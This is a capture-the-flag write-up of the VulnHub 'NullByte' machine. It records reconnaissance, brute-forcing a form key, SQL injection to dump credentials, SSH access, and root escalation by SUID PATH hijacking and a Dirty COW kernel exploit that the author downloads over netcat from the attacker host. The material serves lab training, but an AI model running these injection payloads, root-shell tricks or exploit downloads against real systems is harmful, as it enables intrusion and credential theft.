Recon
NMAP Complete Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# Nmap 7.92 scan initiated Thu Feb 3 18:22:24 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/NullByte/192.168.110.11/scans/_full_tcp_nmap.txt -oX /root/vulnHub/NullByte/192.168.110.11/scans/xml/_full_tcp_nmap.xml 192.168.110.11
adjust_timeouts2: packet supposedly had rtt of -991247 microseconds. Ignoring time.
Nmap scan report for 192.168.110.11
Host is up, received arp-response (0.0013s latency).
Scanned at 2022-02-03 18:22:37 +08 for 24s
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-title: Null Byte 00 - level 1
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34000/tcp6 status
| 100024 1 40022/tcp status
| 100024 1 41283/udp status
|_ 100024 1 57154/udp6 status
777/tcp open ssh syn-ack ttl 64 OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALLUIu4tXFadebYrnD994oq52RRYSpBO4UBHiXnGTGEgm6UlIDR8IT81T9RaJg5DjFIfjfzTfeIJVmDKMk2Zz/itniXKB7FRbF5Exyp4Vu2IzD76Iepu1qBmGrQdgtAwR+rCtu4KQ30KtCK48OvZO409Nbff8AB5ScuHePourSMVAAAAFQDbcAuY6E2l8runB/XMCs4kevsorQAAAIBlurtYJXxZFPdyfnVzCvGlp74pknTmM7BExEyU5tdJAGjPPF3+ApdNXk9b8cWKoKsGK++cEQgkZAuIgj9uso853WwS4NArT/P0j9cmqvKmMmClZWMFf/pXARoW9MsyZ9Eudo2TWBEgtqknVqStsSAp5UaxITyFCGoISaAJSpXtawAAAIEAnGErIK3lL2HxBvKbVJYpKdY9jjlsd+Ly8iPJW5m2BUXRDPVMU4kN5yhXfcK9Ls4W/SWApzj7zt5c5j3KixB8+pjpIMZqqnHbDcHbL1o+gPbwaSzeZVrHxnmCay3eWadclIykRadr3wdsnCa+6wSGEAW/1VbODQ4g84jRVj3iHCo=
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCk720eL8a5T2a7mSbBQm1Ga6mDBH354s4kS4YPzJdZDgpdsRpqyZtrYr09HxkOpdk2Qt5yVo8Wq0UCqGmcqSd5u8Zx36OjUp3gwKhyQD8HXfhr3Edp65wt3PY7jlEKyXrGiJPQWYCOJAxfRW+VzBM13EKRWjS+jlovyjz0/BJpdX/cehGTyg/YkOT98g2oiDZm8ydGmFHa1psATUf2/39NVA6ef6eL+WtrYRljiV7Bu4qrX+WU2DLCZy28SjA23m48I+Thy05pLZTgEYGeBAH6UbC+96DUyrSqbAF0I+OBPXNclrmSB956VdDOBe6RjSJsrO9bXUQbb5oT2XnjdTTB
| 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAkdg5B2LQmX+0vhiEavzVhKN0ZaU1e1Zi1ANcCmz5W63z65sBL6iRvzF+XNCW3dmsvsC1lRlLYDpj94RElY3ag=
| 256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINxwJ5299oAQPJtmnso4wAqIdz2ACkCMWsvxgf16XX/G
40022/tcp open status syn-ack ttl 64 1 (RPC #100024)
MAC Address: 08:00:27:3C:BF:5C (Oracle VirtualBox virtual NIC)
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Sony Bravia smart TV (Android) (93%), Linux 3.10 - 4.11 (93%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (93%), Sony Android TV (Android 5.0) (92%), Android 5.1 (92%), Linux 3.2 - 3.16 (92%), Linux 3.12 (92%), Android 4.0 (92%), Linux 3.13 (91%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.92%E=4%D=2/3%OT=80%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=61FBAD05%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=2%ISR=10C%TI=Z%CI=I%II=I%TS=8)
OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B4ST11NW6%O6=M5B4ST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=N)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M5B4NNSNW6%CC=Y%Q=)
T1(R=N)
T1(R=Y%DF=Y%TG=40%S=O%A=O%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=N)
T6(R=Y%DF=Y%TG=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 0.004 days (since Thu Feb 3 18:16:37 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.31 ms 192.168.110.11
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 3 18:23:01 2022 -- 1 IP address (1 host up) scanned in 38.04 seconds
TCP/80 (HTTP)
FFUF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root💀kali)-[~/vulnHub/NullByte]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php' -fc 403
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.110.11/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 403
________________________________________________
[Status: 200, Size: 196, Words: 20, Lines: 11]
index.html [Status: 200, Size: 196, Words: 20, Lines: 11]
index.html [Status: 200, Size: 196, Words: 20, Lines: 11]
javascript [Status: 301, Size: 321, Words: 20, Lines: 10]
phpmyadmin [Status: 301, Size: 321, Words: 20, Lines: 10]
uploads [Status: 301, Size: 318, Words: 20, Lines: 10]
:: Progress: [18460/18460] :: Job [1/1] :: 1983 req/sec :: Duration: [0:00:03] :: Errors: 0 ::
phpmyadminuploads
Initial Foothold
TCP/80 (HTTP) - Image Forensics + HTTP Form Bruteforce
- View enumerated directories
index.html![]()
phpmyadmin![]()
uploads![]()
- Enumerate
uploads1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
┌──(root💀kali)-[~/vulnHub/NullByte] └─# ffuf -u http://192.168.110.11/uploads/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.php,.txt' -fc 403 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : http://192.168.110.11/uploads/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt :: Extensions : .html .php .txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405 :: Filter : Response status: 403 ________________________________________________ index.html [Status: 200, Size: 113, Words: 6, Lines: 7] :: Progress: [18460/18460] :: Job [1/1] :: 215 req/sec :: Duration: [0:00:04] :: Errors: 0 :: - Tried some default creds on
phpmyadmin, failed - Only clue we have is the image, download the image
1 2
┌──(root💀kali)-[~/vulnHub/NullByte/192.168.110.11/loot/http] └─# wget -q http://192.168.110.11/main.gif
- Detect any hidden text/files
1 2 3
┌──(root💀kali)-[~/vulnHub/NullByte/192.168.110.11/loot/http] └─# exiftool main.gif | grep -i comment Comment : P-): kzMb5nVYJw
kzMb5nVYJw
- Proceed to
/kzMb5nVYJw![]()
- “password ain’t that complex”
- Bruteforce
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
┌──(root💀kali)-[~/vulnHub/NullByte] └─# ffuf -d "key=FUZZ" -u http://192.168.110.11/kzMb5nVYJw/index.php -H "Content-Type: application/x-www-form-urlencoded" -w /usr/share/wordlists/rockyou.txt -fw 19 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive <3 ________________________________________________ :: Method : POST :: URL : http://192.168.110.11/kzMb5nVYJw/index.php :: Wordlist : FUZZ: /usr/share/wordlists/rockyou.txt :: Header : Content-Type: application/x-www-form-urlencoded :: Data : key=FUZZ :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405 :: Filter : Response words: 19 ________________________________________________ elite [Status: 200, Size: 145, Words: 9, Lines: 7] - Submit form w/ elite
![]()
TCP/80 (HTTP) - SQLi Database Enum w/ SQLMap
- Check if it is susceptible to SQLi
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29
┌──(root💀kali)-[~/vulnHub/NullByte] └─# ffuf -u http://192.168.110.11/kzMb5nVYJw/420search.php?usrtosearch=FUZZ -w /usr/share/wordlists/sqli/vulnCheck.txt -fw 3 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : http://192.168.110.11/kzMb5nVYJw/420search.php?usrtosearch=FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/sqli/vulnCheck.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405 :: Filter : Response words: 3 ________________________________________________ " OR 1 = 1 -- - [Status: 200, Size: 168, Words: 33, Lines: 1] " OR "" = " [Status: 200, Size: 168, Words: 33, Lines: 1] " [Status: 200, Size: 168, Words: 33, Lines: 1] # [Status: 200, Size: 224, Words: 33, Lines: 2] :: Progress: [42/42] :: Job [1/1] :: 54 req/sec :: Duration: [0:00:03] :: Errors: 3 ::![]()
- Enumerate the database w/ SQLMAP
- Enumerate database
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
┌──(root💀kali)-[~/vulnHub/NullByte/192.168.110.11/exploit] └─# sqlmap -r sqli.txt -p usrtosearch --dbs --output-dir=$(pwd)/sqlmap Parameter: usrtosearch (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: usrtosearch=" AND 5195=5195# Type: error-based Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) Payload: usrtosearch=" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176786a71,(SELECT (ELT(4502=4502,1))),0x7178767671,0x78))s), 8446744073709551610, 8446744073709551610)))-- RmAL Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: usrtosearch=" AND (SELECT 9975 FROM (SELECT(SLEEP(5)))HjUW)-- Hkvj Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: usrtosearch=" UNION ALL SELECT CONCAT(0x7176786a71,0x6558556579436b4c6b736a645474705970505259756c734c58416f6261784e69665458716864597a,0x7178767671),NULL,NULL# available databases [5]: [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] seth
- Enumerate tables
sethdatabase1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
┌──(root💀kali)-[~/vulnHub/NullByte/192.168.110.11/exploit] └─# sqlmap -r sqli.txt -p usrtosearch -D seth --tables --output-dir=$(pwd)/sqlmap Parameter: usrtosearch (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: usrtosearch=" AND 5195=5195# Type: error-based Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) Payload: usrtosearch=" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176786a71,(SELECT (ELT(4502=4502,1))),0x7178767671,0x78))s), 8446744073709551610, 8446744073709551610)))-- RmAL Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: usrtosearch=" AND (SELECT 9975 FROM (SELECT(SLEEP(5)))HjUW)-- Hkvj Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: usrtosearch=" UNION ALL SELECT CONCAT(0x7176786a71,0x6558556579436b4c6b736a645474705970505259756c734c58416f6261784e69665458716864597a,0x7178767671),NULL,NULL# Database: seth [1 table] +-------+ | users | +-------+
- Dump
userstable1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
┌──(root💀kali)-[~/vulnHub/NullByte/192.168.110.11/exploit] └─# sqlmap -r sqli.txt -p usrtosearch -D seth -T users --dump --output-dir=$(pwd)/sqlmap Parameter: usrtosearch (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: usrtosearch=" AND 5195=5195# Type: error-based Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) Payload: usrtosearch=" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176786a71,(SELECT (ELT(4502=4502,1))),0x7178767671,0x78))s), 8446744073709551610, 8446744073709551610)))-- RmAL Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: usrtosearch=" AND (SELECT 9975 FROM (SELECT(SLEEP(5)))HjUW)-- Hkvj Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: usrtosearch=" UNION ALL SELECT CONCAT(0x7176786a71,0x6558556579436b4c6b736a645474705970505259756c734c58416f6261784e69665458716864597a,0x7178767671),NULL,NULL# Database: seth Table: users [2 entries] +----+---------------------------------------------+--------+------------+ | id | pass | user | position | +----+---------------------------------------------+--------+------------+ | 1 | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank> | | 2 | --not allowed-- | isis | employee | +----+---------------------------------------------+--------+------------+
- Enumerate database
- Pass is base64 encoded & hashed w/ md5
![]()
- ramses:omega
TCP/80 (HTTP) - SQLi Database Enum Manual
- Check if it is susceptible to SQLi
![]()
- Determine SQL query code
![]()
- Hypothesis
1 2 3
SELECT id, name, position FROM users WHERE name LIKE "%<input_field>%" # Instead of ', " is used, thus " allows us to close the previous query and start another one (UNION SELECT)
- Determine the number of columns & reflected columns in this table
1 2 3 4 5 6 7
Plain Text: "UNION SELECT 1,2,3-- - URL Encoded: "UNION+SELECT+1,2,3--+- # Usually either # or -- - would work, but for this, only -- - worked
![]()
- Determine databases
1 2 3 4 5
Plain Text: "UNION SELECT group_concat(SCHEMA_NAME),2,3 FROM information_schema.schemata-- - URL Encoded: "UNION+SELECT+group_concat(SCHEMA_NAME),2,3+FROM+information_schema.schemata--+-
![]()
1 2 3 4 5 6
available databases [5]: [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] seth
- Determine tables in
sethdatabase1 2 3 4 5
Plain Text: "UNION SELECT group_concat(table_name),2,3 FROM information_schema.tables WHERE table_schema='seth'-- - URL Encoded: "UNION+SELECT+group_concat(table_name),2,3+FROM+information_schema.tables+WHERE+table_schema='seth'--+-
![]()
1 2 3
Database: seth [1 Table] users
- Determine columns in
userstable fromsethdatabase1 2 3 4 5
Plain Text: "UNION SELECT group_concat(column_name),2,3 FROM information_schema.columns WHERE table_name='users'-- - URL Encoded: "UNION+SELECT+group_concat(column_name),2,3+FROM+information_schema.columns+WHERE+table_name='users'--+-
![]()
1 2 3 4 5 6 7
Database: seth Table: users [3 Columns] id user pass position
- Determine value of columns in
userstable fromsethdatabase1 2 3 4 5
Plain Text "UNION SELECT group_concat(user,':',pass),2,3 FROM seth.users -- - URL Encoded: "UNION+SELECT+group_concat(user,':',pass),2,3+FROM+seth.users+--+-
![]()
1 2 3 4 5
Database: seth Table: users [Columns: user:pass] ramses:YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE isis:--not allowed--
TCP/777 (SSH)
- SSH w/ ramses:omega
![]()
Privilege Escalation
Root - Via SUID Binary (Path Hijacking)
- Enumerate SUID Binaries
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
ramses@NullByte:~$ find / -perm -4000 2>/dev/null /usr/lib/openssh/ssh-keysign /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device /usr/lib/pt_chown /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/procmail /usr/bin/at /usr/bin/chfn /usr/bin/newgrp /usr/bin/chsh /usr/bin/gpasswd /usr/bin/pkexec /usr/bin/passwd /usr/bin/sudo /usr/sbin/exim4 /var/www/backup/procwatch <- Suspicious
- Execute
/var/www/backup/procwatch, to see what it does1 2 3 4 5 6
ramses@NullByte:~$ /var/www/backup/procwatch PID TTY TIME CMD 3311 pts/0 00:00:00 procwatch 3312 pts/0 00:00:00 sh 3313 pts/0 00:00:00 ps ramses@NullByte:~$
- Based on this, i think
psis being executed
- Based on this, i think
- View contents of
/var/www/backup/procwatch1
ramses@NullByte:~$ strings /var/www/backup/procwatch | grep ps
- Strings did not reveal,
psbeing called
- Strings did not reveal,
- Assumes it calls
psw/o specifying its full path - Exploit via Path Hijacking
- Prepend
/tmpto ramsesPathenvironment variable1 2 3 4
ramses@NullByte:~$ export PATH=/tmp:$PATH ramses@NullByte:~$ echo $PATH /tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games ramses@NullByte:~$
- Create binary to spawn root shell
1 2 3 4 5 6
ramses@NullByte:~$ echo "cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash" > /tmp/ps; chmod 4777 /tmp/ps; ramses@NullByte:~$ ls -l /tmp total 8 -rwsrwxrwx 1 ramses ramses 54 Feb 4 05:49 ps drwx------ 3 root root 4096 Feb 4 02:11 systemd-private-dc0b6a1de996417bb76e2cd0ae273e30-cups.service-2HAlbf ramses@NullByte:~$
- Check if
psfrom/tmpdirectory is called first, before/bin/ps1 2 3
ramses@NullByte:~$ which ps /tmp/ps ramses@NullByte:~$
- Execute
procwatchto create root shell1 2 3 4 5 6 7
ramses@NullByte:~$ /var/www/backup/procwatch ramses@NullByte:~$ ls -l /tmp total 1088 -rwsrwxrwx 1 ramses ramses 54 Feb 4 05:49 ps -rwsr-xr-x 1 root ramses 1105840 Feb 4 05:50 rootbash drwx------ 3 root root 4096 Feb 4 02:11 systemd-private-dc0b6a1de996417bb76e2cd0ae273e30-cups.service-2HAlbf ramses@NullByte:~$
- Obtain root shell
1 2 3 4 5
ramses@NullByte:~$ /tmp/rootbash -p rootbash-4.3# id;whoami uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses) root rootbash-4.3#
![]()
- Prepend
- Root Flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
rootbash-4.3# cat proof.txt adf11c7a9e6523e630aaf3b9b7acb51d It seems that you have pwned the box, congrats. Now you done that I wanna talk with you. Write a walk & mail at xly0n@sigaint.org attach the walk and proof.txt If sigaint.org is down you may mail at nbsly0n@gmail.com USE THIS PGP PUBLIC KEY -----BEGIN PGP PUBLIC KEY BLOCK----- Version: BCPG C# v1.6.1.0 mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK +z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58 kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8 TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU Gms= =PiAQ -----END PGP PUBLIC KEY BLOCK----- rootbash-4.3#
Root - Via Kernel Exploit
- Check system information
1 2
ramses@NullByte:~$ uname -a Linux NullByte 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt11-1+deb8u2 (2015-07-17) i686 GNU/Linux
3.16.0-4-686
- Search exploits for Linux
3.16.0-4-686- https://www.exploit-db.com/exploits/40616
- https://www.exploit-db.com/exploits/40839
- Exploit
1 2 3 4
ramses@NullByte:/tmp$ nc 192.168.110.4 4444 > 40839.c ramses@NullByte:/tmp$ mv 40839.c dirty.c ramses@NullByte:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt ramses@NullByte:/tmp$ chmod +x dirty; ./dirty
![]()
Comments powered by Disqus.